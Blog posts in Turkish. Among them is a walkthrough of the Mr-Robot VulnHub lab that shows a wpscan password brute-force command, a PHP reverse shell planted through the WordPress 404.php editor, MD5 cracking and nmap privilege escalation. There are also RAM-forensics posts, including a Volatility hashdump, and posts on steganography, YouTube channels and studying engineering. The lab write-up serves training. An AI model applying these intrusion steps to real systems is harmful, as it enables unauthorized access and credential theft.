Kategoriler
Adli Bilişim Linux

Adli Bilişimde Ram İmajı Almak ve Ram Analizi

İmaj alma ve üzerinde çalışma yapma aşamasından öncesinde ram mantığını anlatmak isterim kısaca. Ram, Random Access Memory demektir. Yani rastgele erişilebilir bellek. Geçici hafıza dediğimiz kısımdır. Sizlerin bilgisayarınızda kalıcı olarak saklamak istemediğiniz, gerek duymadığınız şeyler burada saklanır. Örnek vermek gerekirse, bir oyun oynuyorsunuz ve açılışta bir bekleme süresi tanıyor. İşte bu esnada oyun paketleri geçici belleğe yüklenir. Bu sayede daha hızlı erişim sağlanır oyun esnasında. Kimi oyunlarda belli bir aşamaya gelince birkaç saniyeliğine bekletir ve yeni dosyaları o aralıkta geçici belleğe aktarmayı tercih eder. Diğer yandan çerez bilgileri, son yaptığınız işlemler ve daha pek çok şey bu bellekte yer alır. Ancak enerji kesildiğinde yani bilgisayarı kapattığınızda, şarjı bittiğinde veya prizden çektiğinizde, özetle bilgisayarın enerjisini kestiğinizde geçici bellek kendini sıfırlar. Şimdi ram analizi yaparken nelere erişebileceğimiz kafanızda daha iyi şekillenmiş olmalı.

Öncelikle ram imajını nasıl alacağız bunu anlatalım. Demiştik ya enerji kesintisinde bellek kendini sıfırlar. İşte bu yüzden çalışır durumda kalmak zorundadır imaj alınacak cihaz. Filmlerden hatırlarsınız, bir hacker vardır özel tim girer kapıyı bir tekmeyle parçalar, hackerı tutuklar kasayı çeker sırtlar götürür. Öyle bir dünya yok. O enerji kesilirse ramdeki tüm bilgiler kaybolur. Çalışır halde imaj alınmalıdır. Diğer yandan şayet siz kapınızda özel tim falan görürseniz ramdeki bilgileri kaçırmak adına bilgisayarı kapatabilirsiniz evet.

Ram imajı almak için yardımcı birçok program var. Ben Windows’ta çalıştığınızı kabul ederek Ram Capture programını önereceğim. Programı açtıktan sonra “.mem” uzantılı imajın nereye kaydolacağını belirliyorsunuz ve capture butonuna basıyorsunuz. Hepsi bu. Belli bir sürecin sonunda imajı alıyor. İşte şimdi o bilgisayar kapanabilir. Çünkü geçici belleğin kopyası eksiksiz elinizde.

Gelelim bunun incelenmesine. İncelemeyi de linux üzerinde yaptığınızı kabul ediyorum ve “volatility” aracı üzerinden anlatımıma devam ediyorum. Öncelikle ram dosyamızın olduğu dizine geçiyoruz “cd” komutu ile. Daha sonra çalışmaya başlıyoruz. “volatility -f ram.mem imageinfo” komutu ile ram imajımızı aldığımız bilgisayarın işletim sistemine dair bilgi topluyoruz. Sonraki komutlarda da ihtiyacımız olacak.

Daha sonrasında çok fazla komutla çalışmak mümkün. Tamamı için “volatility -help” komutunu çalıştırabilirsiniz. Ben önemli olanlardan bahsedip birkaç örnek görüntü paylaşacağım.

volatility -f ram.mem –profiles WinXPSP2x86 hashdump

Bu komut ile Windows sistemdeki kullanıcıları ve şifrelerini tespit etmeniz mümkün. Şifreler md5 formatında geliyor olacak.. Onları kırmak da size kalmış.

volatility -f ram.mem –profiles WinXPSP2x86 iehistory

Bu komutla da internet explorer geçmişini görmek mümkün. Aman canım explorer kullanan mı kaldı? Eh kalmadı fakat ben yine yazımda belirteyim. Chrome ve diğer tarayıcılardan geçmişi çeken araçlar da var.

volatility -f ram.mem –profiles WinXPSP2x86 notepad

Bu komut ise notepad üzerinde yapılan son işlemleri kaydeder. Dikkat ettiyseniz internet geçmişinde son girilenlerde bir txt dosyası yer alıyordu. Burada da acaba onda ne yazıyormuş diye bakmış olduk. Son yazılan sizce de şüpheli değil mi? Sezar şifrelemeye benziyor. İsterseniz araştırın bakalım ne yazıyormuş notepad dosyasındaki şifreli metinde 🙂

volatility -f ram.mem –profiles WinXPSP2x86 pslist

Pslist ile o esnada çalışan programları görmek mümkün. Ram imajı aldığınız programı da görmeniz güçlü ihtimal. Sonuçta son çalışanlar listesinde o da var.

volatility -f ram.mem –profiles WinXPSP2x86 dlllist

Bu komutta ise dll listesi oluşturur bizim için. Bu komutla beraber örneklerimi sonlandırayım. Sizler diğer komutları inceleyebilirsiniz. Çok ilginizi çeken bir komut varsa veya merak ettiğiniz, yorum olarak bırakabilirsiniz. Sürücüleri listelemek, dump işlemleri yapmak da mümkün imaj içerisinde.

Kategoriler
Siber Güvenlik Video

Görsellere Dosya ve Metin Saklamak [Stenografi]

Stenografi esasında söylenenlerin çabucak, kısaltmalarla, belli sembollerle yazılması anlamına geliyor. Fakat bizim inceleyeceğimiz nokta biraz farklı. Stenografi aynı zamanda görsellere bir şeyler saklamaktır diyebiliriz. Örnek vermek gerekirse milattan önceki dönemlerde gizli mesajlaşmalar için kölelerin saçlarını kazırlarmış, kafasına gizli metni yazarlarmış. Daha sonrasında ise saçlarının uzaması beklenirmiş. Arkasından da mesajın ulaşacağı kişiye gönderilirmiş. Mesajı okumak isteyen kişi ise kölenin saçlarını tekrar kazıyarak metne ulaşırmış. 

İkinci Dünya Savaşı sırasında da Almanlar magazin dergilerinin, gazetelerin ara satırlarına görünmez mürekkep ile mesajlarını yazarak düşmanlarına bilgi kaptırmadan uzun süre haberleşmişler.

 

E tabii şimdi teknoloji başka bir boyutta. Haliyle bizim kullanacağımız yöntem de farklı olacak. Biz dijital görsellerin içerisine bazı ufak dosyaları veya metinleri gizleyeceğiz. Ben bunun için SilentEye isimli programı kullanacağım. Buraya tıklayarak dosyayı indirmeniz mümkün.  Programın açılışında bizi basit bir ekran karşılıyor. Öncelikle görsel seçmeniz gerek. İster File kısmından Open seçeneğini seçin (CTRL+O) ister görselinizi direk olarak programın üstüne sürükleyin. 

 

Daha sonrasında Encode seçeneğine geçiyoruz. Bizi karşılayan ekranda en üstte bulunan Media’s encoding format seçeneğinden JPEG veya BMP formatlarını seçmeniz mümkün. 

Daha sonra luminance interval kısmından parlaklık üstünde oynamanız mümkün. JPEG quality ile görselin kalitesini ve haliyle boyutunu değiştirmeniz mümkün. Boyut meselesi önemli son aşamada oraya da değineceğiz. Header position kısmı ile şifreli metnin yer alacağı kısmı belirlemeniz mümkün. Sonuçta birkaç bitlik veriler resme işleniyor.  Passphrase kısmı da anladığınız üzere şifre kısmı. Dilediğiniz şifreyi girin ve aynı şifreyi karşı tarafa da verin. Daha sonra gizli verinin yer aldığı fotoğrafı nereye kaydedeceğinizi seçin. Son olarak ister metin yerleştirin ister sağ taraftaki seçeneklerden bir dosya tercih edin.

 Gelelim işin decode yani şifreli görseli açma aşamasına. Programa tekrar sürükleyerek veya file kısmından open diyerek şifrelenmiş görseli programa atıyoruz ve decode seçeneğine geçiyoruz. Sonrasında doğru şifreyi giriyoruz. Biraz beklediğimizde bize içerisindeki gizli veriyi veriyor program. Son olarak şuna dokunmam gerekiyor, görselin boyutu büyüdükçe içine yerleştirebileceğiniz verinin boyutu da artacaktır. Bu yüzden boyut önemlidir görsellerde.

Kategoriler
İnceleme Ivır Zıvır

Takibe Değer Youtube Kanalları

Bir süredir haftalık olarak video bildirimi aldığım kanallar vardı. Gerçekten de boş zamanlarımda bana çok şey katan videolar izledim, podcast haline getirdim, yürürken, tramvayda, otobüste hatta bazen uyumadan önce bu içerikleri tükettim. Ancak Youtube o kadar hızlı ilerledi ki çok daha fazla kaliteli içerik üretilmeye başladı. Ben de keşfedebildiklerimi sizlerle tekrar paylaşayım dedim. Sizlerin varsa yorum olarak bırakmanız beni mutlu eder.

Öncelikle Barış Özcan,  Başka Bir Şey,  Bi’KafalarVASPFilmler ve FilimlerTEDx gibi kanalları önerdiğim yazımı şuraya bırakayım, onlara da mutlaka bakın : https://caglar-celik.com/index.php/2017/10/12/matrak-youtube-kanallari/

Bir de Görünen Adam isimli bir youtube dizisi mevcuttu : https://caglar-celik.com/index.php/2017/10/12/bir-youtube-dizisi-gorunen-adam/

Yazıya geçmeden önce ufak bir de web sitesi paylaşmak istiyorum. Astronaut (www.astronaut.io) isimli bu sitede Youtube’da neredeyse hiç izlenmemiş videolar kısa süreliğine karşınıza çıkıyor ve belirli aralıklarla yenisi geliyor. İnsanların belki de öylesine kaydettiği videolar göreceksiniz. Anılarına şahit olacaksınız onların gözünden. Belki de çok saçma şeylerle karşılaşacaksınız. Ancak sitenin de söylediği üzere, tıpkı bir astronot gibi yepyeni şeyler keşfedeceksiniz. Gelelim esas yazımıza. 

1) NEBUCH

https://www.youtube.com/user/Nebuch/

Gördüğüm en çarpıcı kişisel bloglardan birisi olduğunu söyleyebilirim. Hayata dair bir anlığına aklımıza gelen sonra bir kenara attığımız soruların üstünde düşünüp çok daha derine iniyor. Daha sonra kendi fikirlerini de vloglarla paylaşıyor. Bir süredir takip listemde olmasına rağmen Siber Punk videosunu attıktan sonra “Dur şuna bir bakayım” demeyi akıl ettim. Doğrusu en çok ilgimi çeken videolarından birisi de oydu.

2)Sunay Akın

https://www.youtube.com/user/SunayAkin62

Sunay Akın eskiden beri Youtube kanalına içerik giriyor fakat diğer sosyal medya hesapları kadar insanı çevresine toplamamış bu mecrada. Bir hafta önce yeniden içerik üretmeye başlayan Akın, tekrar kanalını şenlendirecek gibi. Oyuncak Müzesi ve kitapları ile hafızamda kalan ismi ile açtığı kanalda 11 ay öncesinde girdiği kısacık hikayeler de benim için oldukça keyifliydi. Çikolatanın bitmesinden korkar da yavaş yersiniz ya, onun videolarını da tek seferde izlemekten çekindim. Umarım ben eski içerikleri tüketene kadar o bir o kadar güzel videolar hazırlamış olur. Bu arada belirtmem gerekiyor, yalnızca kitap yazan veya müzeyi oluşturan birisi değil. Çok farklı uğraşları var. Örneğin hayatına dair okuduğum kısa bir şey vardı, İlk şiirini dokuz yaşında iken bir kız için yazmış. Şiiri kızın evindeki balkon kapısına kazımış. Soğuk kış mevsiminde aile o kapıyı yakmış. Ve Akın’ın o şiiri yerine ulaşamamış.

3) Cep Hikayeleri

https://www.youtube.com/channel/UCaMkVc_bfovLxz40vrmEtWQ/

Herkesin bir hikayesi var. Ancak her birimiz kendi hikayelerimize o kadar odaklanmışız ki hayatta başrol biziz sanıyoruz. Ancak sokakta baktığımız yüzlerin, otobüste, metroda yanlarından kayıtsızca geçtiğimiz insanların her birinin, film senaryosu olacak kadar özel hikayeleri olduğunu fark ettiğinizde perdenin önünüzden kalktığını göreceksiniz. Ve oyun işte o zaman gerçekten başlayacak. Bu keşfi yapmanızı sağlayacak bir kanaldan söz ediyorum. Kısa kısa, bu insanların hayatlarından parçalar paylaşıyorlar bizimle. Sadece 3-5 dakikalık kesitler…”Bir esnaf, bir sanatçı, bir genç veya bir yaşlı; Cep Hikayeleri’ne göre herkesin anlatacak bir hikayesi vardır.”

4) Hikayesi Ne?

https://www.youtube.com/channel/UCjs3Yj1cXXQ1CYvRlpjuY4w/

Sonunda adamıma geldi sıra 🙂 Youtube’da bana en samimi gelen insanın sunumunu yaptığı bu kanalda tarih başta olmak üzere pek çok eğlenceli hikayeler görsellerle desteklenerek anlatılıyor. Bana kalırsa her yaştan insanla izlenebilecek bir kanal. Kardeşime, dostuma, aileme ve hatta dedeme izlettiğim, hepsinden de güzel dönüşler aldığım, video sonlarında kısa tartışmalar yaptığımız bir kanal. Ne diye parlatıp cilayayayım ki? Geçin izleyin, ilginizi çekeceğinden neredeyse eminim.

5) Koff Animation

https://www.youtube.com/channel/UCuNZLqt1BOsM8bjAvHVerCQ/

Kofff Animation ne yazık ki oldukça az içerik çıkartan kanallardan. İstanbul’da bir animasyon şirketi. Ara sıra eğlence amaçlı yaptıkları animasyonları kanala yüklüyorlar. Fakat gerçekten de izlemeye değer animasyonlar bunlar. Müslüm Baba’nın hayatı ancak bu kadar insana işlenebilirdi. Hele ki Zeki Müren… Son olarak ise Süleyman Seba… Hepsinin hayatını keyifli animasyonlar haline getirirken güzel de bir seslendirme yapmayı unutmamışlar. Ayrıca Bülent Ersoy ile Adnan Oktar’ın dövüşü de muzip bir çalışmaydı. Umarım takipçilerini unutmazlar.

6) STOLK

https://www.youtube.com/channel/UCvUbNqBKY_uHAfgs-xacGdQ

Bu kanalı trendlerden zaten görmüşsünüzdür. İzlememenize imkan yok. Ama listeme dahil etmemek attığım her kahkahanın haram olmasına sebep olurdu. Vebali büyük. İlk sezon sunucusu İbrahim Selim iken bu sezon Ümit Erdim’in sunumunda devam eden stolk, gündemin ucundan yakalayarak muzip ve ince dokunuşlarla mesaj gönderen, yok yok laaaak diye mesajı çakan harika bir kanal benim nazarımda. Sunucu değiştirmesi takipçilerinin canını sıksa da ben oldukça memnunum. İbrahim samimi adam kabul ama Ümit Erdim de hiç fena değil sanki.

7) KURCALA

https://www.youtube.com/user/kurcaLaa/

Kurcala, iki kafadarın belli bir mizah çerçevesinde çektiği “videolar silsilesi”. Ankaralıların ayrı bir takip ettiği kanal, ülke meselelerini mizahi bir üslupla kurcalıyor. Hele bir de mevzu bahis Ankara ise mizahla tokatlıyor geleni geçeni. Bildirim geldiğinde mutlu olduğum kanallardan birisi. 

8) Kamusal Mizah

https://www.youtube.com/user/199sokak/

Yüz defa izlediğim, dilime dolanan replikleri ile gerçekten çok güldüğüm bir kanal. Çok üst düzey bir espri ve gönderme var videolarını her yere yapıştırıverdiğim da bir gerçek. Doğrusu mizahı herkese hitap eder mi bilmem fakat frekansı uyuşanların bir de Deniz Bağdaş‘ı incelemesini de yazı içinde önermiş olayım. 

9) Çağlar Avcı

https://www.youtube.com/user/mcavcil

Dürüst olsaydı serisi ile adını daha bir duyuran kanal. Apple bize dürüst olsaydı videosu ile kanala abone oldum, ki sizin de izlemenizi öneririm. Büyük markalar gerçekleri söyleseydi neler derdi? Apple’ın bir üst modelinde azıcık ekranı büyütmesi, bir özelliği kırpması, diğerini kaldırması, her ürününde cins cins mevzular dönmesi sizin de canınızı sıkmamış mıydı? Hah işte bu kanal bunların hepsini dürüstçe söylüyor markaların yerine.

10) Anatolian Rock Revival Project

https://www.youtube.com/user/AnatolianRockRevival

Bu yazıyı hazırlarken kulaklığımdan bana eşlik eden müzikler bu listeden çalıyor. Günümüze çok da kalamamış rock müzikler ve rockçılar bu kanalda toplaşmış. Ben zaten hem rock müzik hem de eski müzikleri seven birisiyim. Bu kanal benim için bulunmaz bir nimet. Ayrıca kapak tasarımlarının da şahane olduğunu not düşmem gerek. Her şarkı için özel olarak hazırlanmış. “Bu sanat projesinin amacı Türkiye’nin Rock tarihinden pek bilinmeyen eserleri gün ışığına çıkarmak; herkesin duymasını, öğrenmesini sağlamaktır.” 

11) Bilimkurgu Kulübü

https://www.youtube.com/user/BilimkurguKulubu

Bilimkurgu Kulübü’nü Sight isimli kısa film ile tanıdım. Beni oldukça korkutmakla beraber daha önce benzer bir şeyi hayal ettiğim için ayrıca ilgimi çekti. Diğer videoları da izlemeye aldım. Bilim kurgu adına yapılan kısa filmleri Türkçe yayınlayan bu kanal, yapay zeka ile ilgili teorilere dair etkileyici filmlere de sahip. “Bilimkurgu Kulübü, bilimkurgu alanında çok geniş yelpazeli bir fikir ve paylaşım platformu olarak hayat bulmuştur.”

Kategoriler
Linux Siber Güvenlik

Mr-Robot Pentestlab Challange

PentestLAB içinde üç adet flag bulunmaktadır. Beginner düzeyinde olan Mr-Robot PentestLAB indirme linklerine ve lab hakkındaki diğer bilgilere Vulnhub’dan ulaşabilirsiniz.
https://www.vulnhub.com/entry/mr-robot-1,151/

PDF formatında çözüme şuradan ulaşabilirsiniz : https://drive.google.com/open?id=1EmGawNq-cc1aY-agVj-5qaQTwnA3tQNK

Verilen sanal makineyi kurduktan sonra NAT ağına bağladım. Girişte şifre ekranı ile karşılaştım. Bu demektir ki direk makineye erişimim yok. Başlangıçta herhangi bir bilgi de verilmiyor.

Linux tabanlı ParrotOS işletim sistemim üzerinden işlem yapmaya başlıyorum. “ifconfig” komutu ile ip aralığımı öğreniyorum.

Daha sonra pentestlabın ip adresini temin etmek için netdiscover aracılığı ile bir tarama gerçekleştiriyorum. 192.168.247.131 benim pentestlabımın adresi.

netdiscover -r 192.168.247.128

“192.168.247.131” adresine ait açık portlara bakmak gerek. Bir nmap taraması başlatıyorum. 22 portu kapalı olmasına rağmen karşıma çıkartıyor. 80 portu açık. Bu demektir ki web üzerinden işlem yapabilirim.

Daha sonra bu adresi Mozilla tarayıcıda yokluyorum. Terminal görünümü verilmiş bir web sitesi karşılıyor beni.  Seçenekleri yokluyorum fakat herhangi bir ipucuna rastlamıyorum.

Nikto aracı ile bir tarama yapıyorum ve birkaç uzantı karşıma çıkıyor. “robot.txt” ve “license.txt” dikkatimi çekiyor. İkisini de tekrar tarayıcıma yazıyorum. Daha önemlisi sitenin wordpress olduğunu ve apache server kullandığını anlıyorum.

“robots.txt” içerisinde üç flagden birisi ve bir wordlist mevcut. İlk flagimi not alıp admin panelini yokluyorum.

Şimdi admin paneline giriş yapmayı deniyorum. “Admin:admin” veya “admin:password” denemelerim başarılı olmayınca fark ediyorum ki kullanıcı adı admin değil. Ana temamız Mr Robot’tan yola çıkarak kullanıcı adına “elliot” demeyi deniyorum. Kullanıcı adı doğru fakat sık kullanılan parolaları test etsem de parolayı bulamıyorum. “robots.txt” ile elde ettiğim wordlist burada işe yarayacaktır diye tahmin ederek bir tarama başlatıyorum.

Wp-scan aracı ile tarama başlatıyorum fakat bu oldukça uzun sürüyor.

wpscan –url 192.168.56.101 –username elliot –wordlist /home/deneyimsizdenek/Desktop/fsocity.dic

Nihayetinde şifre ortaya çıkıyor.

Giriş yapmayı deniyorum ve beni wordpress admin paneli karşılıyor.

Şimdi de siteye shell yedirmek için menüde şu yolu izliyorum : Appearance > Editor > 404.php
404.php sayfasına belirlediğim php shelli yerleştiriyorum.Shell üzerindeki ip adresi kısmını ve port kısmını düzenliyorum.

Shelli şuradan indirebilirsiniz : https://drive.google.com/open?id=1ieRK9Zg-MF_XeGNGTsVUNqWoDytpjHuA

Daha sonra “1234” portunu dinlemeye başlıyorum. Listening karşılığını aldıktan sonra “192.168.247.131/404.php” adresine giriyorum. “$” işareti ile shelli başlattığımı anlıyorum.

“ls” komutu ile klasörleri listeliyorum. “Root” klasörüne erişim iznim yok, fakat mevcut kullanıcım ile hak elde edeceğim daha sonra. Şimdilik home klasörüne ardından da robot klasörüne giriyorum. (Örnek komut : cd home veya cd robot) Daha sonra karşıma password.raw-md5 ve key-2-of-3.txt dosyaları çıkıyor.İkinci keye erişim iznim yok fakat md5 dosyasına var. Ve sonuç karşımda…

Elde ettiğim md5’i crackstation.net sitesinde kırmayı deniyorum. Ve şifrenin “abcdefghijklmnopqrstuvwxyz” olduğunu buluyorum. Kullanıcı ismi ise “robot”.

PentestLAB login kısmına bu bilgilerle giriş yapmayı deniyorum.Giriş yapıyorum fakat root yetkilerine sahip değilim. Nmap kullanarak root klasörüne erişiyorum ve son flagi elde ediyorum.

Kategoriler
Ivır Zıvır

Bilgisayar Mühendisliği Hakkında Detaylar

Ben Selçuk Üniversitesi Teknoloji Fakültesi Bilgisayar Mühendisliği öğrencisiyim. Popüler bir bölüm kazanılınca klişe soru yapıştırılır, nasıl kazandın, ne yapmak gerek. Az önce bana da Twitter’dan benzer bir mesaj geldi. Üstüme düşen vazifeyi yapayım dedim. Sınav zımbırtısında ne yaptım, şu an ne halt yiyiyorum, idealim ne onlardan bahsedeyim istedim. Ancak şu anda birinci sınıfım ve muhtemeldir ki keşfedecek çok şey var. Ümit ediyorum ki onları da ileride sizlerle paylaşacağım.

Mütevazi olmayacağım ilkokulda ciddi manada başarılı bir öğrenciydim. Öte yandan bilgisayarla da oldukça haşır neşirdim. Basit web siteleri yapardım, basit araçlar ile hackercılık oynardım, tasarım yapardım, html ve css öğrenirdim. Fena sayılmayacak bir lise kazandım. Ancak lisede çok başarılı olduğum söylenemez. Diğer yandan bilişim alanında çok fazla bağlantı yakaladım, her alanda taban oluşturacak düzeyde bir şeyler öğrendim. Velhasıl lise son sınıfta İstanbul Gelişim Üniversitesi bilgisayar mühendisliği kazandım. O sıralar başka sıkıntılar oldu ve ben o üniversiteye gidemedim. Bir sene daha hazırlandım fakat seneye gireceğim sınavda puanımın kesileceğinin farkındaydım. Deli gibi ders çalıştım diyemem ama o boş senemde çok şey kazandığımı söyleyebilirim. Nihayetinde Selçuk Üniversitesi’nde aynı bölümü kazandım. Ancak az önce bahsettiğim puan kesildiğinde 30 bin kişi geriye gittim. 120 bin civarı sıralamam ile bu üniversiteye geldim.

Öncelikle teknoloji fakültesi olayını anlatayım. Tercih listemde bu seçeneği bulundurmadan önce bir araştırma yaptım. Teknoloji fakültesi bir süre adam yerine konmamış, imza hakkı olmamış, mühendis kabul edilmemiş. Fakat Türkiye’deki birçok mühendislik programından daha düzgün eğitim verdiği de gerçek. Bildiğimiz mühendislik fakültesinden farklı olarak buradaki öğrenciler teorik eğitim yerine pratik eğitim görür, işi iş yerinde öğrenir, stajı boldur. Sallıyorum mühendislik fakültesinde bir makine mühendisi lehimi eline üçüncü sınıfta alıyorsa teknoloji fakültesindeki öğrenci ilk seneden o lehimi kullanır. Mühendislik fakültesi mezunu ile teknoloji fakültesi mezununun statüsü aynıdır. Nihayetinde fakültemden memnunum bu anlamda.

Bilgisayar mühendisliği olayına gelirsek, normal şartlar altında donanımsal meselelerle ilgilenen insanlar olmalıyız. Fakat Türkiye şartlarında bu pek mümkün değil. Çünkü bizim ülkemizde hiçbir bilgisayar parçası üretilmiyor şu anda. Bir hocamın belirttiği üzere Casper’ın dış kasalarını üretiyoruz, o bilgisayarı duvara bağlasak yine çalışacak. Ufak bir not düşeyim, o hocamdan çok alıntı yapacağım muhtemelen. Öyleyse bize düşen şey yazılımsal bir şeyler üretmek. Çünkü maliyeti az, kazancı çok ve imkanı geniş olan alan orası. “Yazılım mühendisi yapmıyor mu kardeşim o işi?” diyen varsa aranızda olay çıkartırım. Yazılım mühendisi, yazılım projelerini yöneten adamdır. elbette yazılım bilir fakat onun işi biraz daha farklı. Bilgisayar mühendisliğinde muhtemeldir ki ilk öğreneceğiniz şey C dili olacaktır. Yazılım dili öğrenmeye başladığınızda matematiğin ne kadar benzer olduğunu ve neden bilgisayarın matematikle bağdaştırıldığını anlayacaksınız. Bilgisayar yapısı matematik üzerine kurulu bir sistem. Yine aynı hocam bilgisayar mühendislerini büyücülere, bilgisayarı büyülü bir kutuya benzetti ilk dersinde. Biz büyülü sözler söylüyoruz ve o kutu bizim için onu makine diline çevirip gerçekleştiriyor. Diğer yandan bu kutu oldukça aptaldır. Her haltı söylemek gerekir. Sonra düşünce biçiminizi oldukça değiştirmeniz gerekir. Bilgisayara söylediklerinize dikkat etmelisiniz. Kısa bir anektod vardır ki o aslında durumu oldukça iyi izah eder. 

Programcıya annesi dedi ki; “Tatlım, lütfen markete git de bir şişe süt al. Eğer yumurta varsa 6 tane getir.”
Programcı eve döndü ve elinde 6 şise süt vardı.
Annesi: Niye 6 şise süt aldın ki?
Programcı: Çünkü yumurta vardı.

Her işin başı hevestir, sevmeden yapılmaz. Bilgisayar mühendisliği de öyle. Benim sınıfımda ben hemşirelik okuyacaktım, veteriner mi olsaydım yoksa öğretmen mi diyenler var. Kesinlikle onları yermek için söylemiyorum fakat ben bu mesleği gönüllü ve bilinçli bir şekilde seçen birisi olarak daha önde olacağıma inanıyorum. Diğer yandan ilk günden aynı dili konuştuğum insanların içinde olmak beni oldukça heyecanlandırmıştı. Karşımda “bitcoin ne kardeş, feys patlatabiliyor musun ehehehe, wordpress ne ola ki?” diyen insanlar, bilgisayarı her bozulunca bilgisayardan anlayan tanıdığa şuna format atıver hele diyen tipler yoktu. En azından çoğu… Ancak sınıfımın çok kalabalık olduğunu ve bu yüzden pratik derslerin laboratuvarlarda yapılamadığını belirtmeliyim.

Bulunduğum üniversitede teknoloji fakültesinin en büyük avantajı ilk sene az dersim olması ve yoğun olmaması. Bunu fırsat bilerek önemli siber güvenlik konferanslarına katıldım. Çünkü bölümdeki en önemli sıkıntım siber güvenlik ile alakalı bir ders olmaması. Yüksek lisans olarak verilen derslere girmek için izin almak istediğimde o derslerin anlatılmadığını, öğrencilerin ödevlendirildiği ve sunum yaptığı söylendi. Okulda gönüllü bir öğrencinin organize ettiği beyaz şapkalı hacker kursu dışında çok imkanım olmadı henüz. Bu alanda bir çalışma yapacaksam mecburen tek başımaydım. Gittiğim konferanslarda ve eğitimlerde bağlantılar kurdum. Büyük şirketler ile tanıştım. Üniversitede bu bağlantıları mutlaka kurun. Hatta bir şirket konferans sırasında sen bizim şirkete stajyer olarak başvur ileride dedi, ayrı bir eğitim grubuna dahil etti. Hala o kadrodan devam ediyorum. Şunu da eklemeliyim bu konferanslarda aynı dili konuşmaktan ziyade aynı şive ile konuşuyorduk ki bu daha bir heyecan vericiydi. Tam olarak aynı kafada olduğum insanlar ile karşı karşıyaydım. Çok verimli geçen konferanslar bunlar. Sizlere de önerim üniversite seçerken bu tip konferanslara kolay erişeceğiniz bölgeler tercih edin. İstanbul ve civarı bu konuda inanılmaz faydalı. Ankara da öyle. Konya’dan Ankara’ya gidip gelmem kolay olduğu için şanslı olduğumu söyleyebilirim. Bu konferansları takip edin. Belli web sitelerini irdeleyin. Twitter’dan bu alandaki şirketleri takibe alın. Yaz ve kış tatili kampları var onlara dahil olun.

Bilgisayar mühendisleri deli paralar kazanabilir mi? Evet. Hepsi büyük paralar kazanıyor mu? Hayır. Yeni mezun birisi üç bin lira alıyor diye duydum. Daha sonraları elbette bu para artıyor. İşsiz mühendis var mı? Evet. Ancak neden işsiz ona bakmalı? Ben, bana WordPress ne diyen mühendisler biliyorum. Tamam bana WordPress ile ilgili derinlemesine bilgi sahibi olmana gerek yok. Her şeyi de bilmez elbette mühendisler. Ama dünyadaki web sitelerinin yarısından fazlası bu sistemle hazırlanıyor insan bir bakar ne bu diye değil mi? Şimdi bu adamın işsiz kalması sizce de normal değil mi? Araştırmacı, meraklı, çalışkan bir mühendisin iş bulmaması bence pek olası değil. Yukarıda da dediğim gibi birinci sınıfım, tamamen hevesli olduğum için, biraz da siber güvenliğe dair bazı şeylere elim yatkın olduğu için stajı bizde yapmayı bir düşün deniyor. Okulun belirlediği şirketler de var staj için. Ve bu stajlardan para almanız gerekiyor yasal olarak. Fakat bazı şirketler benim zaten elemanım var neden para vereyim diyor. Sonra staj bulamıyorsunuz. Bu yüzden bazı şirketler ile staj yaparken maaş almak istemediğinize dair bir kağıt imzalamanız gerekebiliyor. Şu var, istediğiniz her yerde ve her an staj yapabilirsiniz. Okulun belirlediği tarihlerde zorunlu stajlar vardır ancak onlarda da okulun belirlediği yer dışında staj yapabilirsiniz. İsterseniz gidin Apple’da, Google’da yapın.

Şimdi hevesiniz varsa mutlaka gelin bu bölümü okuyun. Ancak şu var, ben mühendis olacağım diyerek gaza gelip iki gün deli gibi ders çalışıp sonra bırakmanın hiçbir hayrı yok. Dediğim gibi ben çok çalışmadım dürüst olayım. Ufak tefek planlarıma uyarak çalıştım. Gezdim eğlendim. Bilgisayarla da uğraştım, sorumluluklar aldım. Sosyal sorumluluk projelerimin neredeyse tamamını bu sene yaptım. Sonra tutup bilgisayar mühendisi olacağım o zaman yazılım öğreneyim, linuxu çözeyim, şu bilgisayar parçalarını öğreneyim sınava çok da gerek yok zaten demeyin. Dengenizi düzgün kurun. Sınava bir seneniz varsa ağırlığınız o sınav olsun. Siz seçeceğiniz üniversiteye göre hareket edin. Şu bir gerçek, ODTÜ, Boğaziçi gibi yerlerden mezun adam öndedir bir adım. Belki birkaç adım. Kapatmam mümkün ancak ekstra uğraş gerektirir. Tüm bunlara rağmen iş sizde bitiyor. Ortalama üniversitelerden mezun olup Microsoft’ta mühendislik yapanların hikayeleri var Youtube’da. Diğer yandan yukarıda anlattığım gibi şehir seçerken iyi düşünün. Sonra tercih edeceğiniz üniversitedeki derslere bir bakın bakalım ilginizi çeken şeyler var mı? Örneğin yukarıda dediğim gibi siber güvenliğe dair hiçbir dersim yok. Fakat başka bir üniversitede arkadaşlarım bu alanda dersler görüyor. Hocalarına göz atın profesör sayısı kaç, öğrenci başına düşen eğitim görevlisi sayısı kaç? Profesör olayı göreceli yalnız. Bilgisayar mühendisliği yeni bir dal. Profesörler başka bölümlerden devşirme olabiliyor. Son olarak İngilizce önemli. Önemli kaynakların büyük kısmı İngilizce ve Türkçe kaynaklarda bu adam ne demiş yahu demek olası. Hem bir yenilik olduğunda ilk önce İngilizce kaynaklarda çıkıyor. Bir Türk onu okuyacak, tamamen anlayacak, harika bir Türkçe çeviri yapacak ve hatasızca onu size ulaştıracak. Bu süreç bazen iki üç seneyi bulabiliyor. O yüzden İngilizce gerekli bir dil.

Selçuk Üniversitesi’ne değineyim biraz da. Gerçekten büyük bir kampüse sahip. İmkanları çok fazla. Oldukça fazla üniversite topluluğu var. Bilişim alanındaki topluluklar biraz zayıf fakat seçenekler var. Biz de şu an bir siber güvenlik topluluğu oluşturmak istiyoruz. Diğer yandan üniversite kütüphanesi oldukça etkiledi beni. Tüm kitaplara hızlı bir biçimde göz atıp aldım. En basiti Kodlab’ın birçok kitabına ücretsiz erişebiliyorum. Kampüs içinde tramvay hattı var ve ücretsiz. Öğrenciler için bisikletler var belli bölgelerde. İki adet yurt var birisi KYK diğeri üniversite yurdu. 100 bine yakın öğrenci var. Oldukça güzel spor tesisleri var. Neredeyse birçok imkanından faydalanıyoruz üniversitenin. Konya ise şu sıralar hissettiğim üzere soğuk bir şehir. Diğer yandan oldukça büyük ve bir yerden başka yere gitmek sağlam ulaşım hizmetine rağmen 1-2 saat sürebiliyor. Üniversite merkeze uzak. Bosna mahallesi bazı şehirlerden bile büyük. Tam olarak öğrenci mahallesi ve imkanları güzel bir yer. Üniversiteye dair ciddi bir şikayete henüz rastlamadım doğrusu. 

Son olarak bu yazıda eksikler olduğunu belirtmeliyim. Gece 3’te gördüğüm bir soru üzerine yazıyorum ve kafamı toplamam pek kolay olmadı. Diğer yandan henüz birinci sınıfım ve eminim çok daha fazla şey öğreneceğim.

Kategoriler
İnceleme Teknoloji

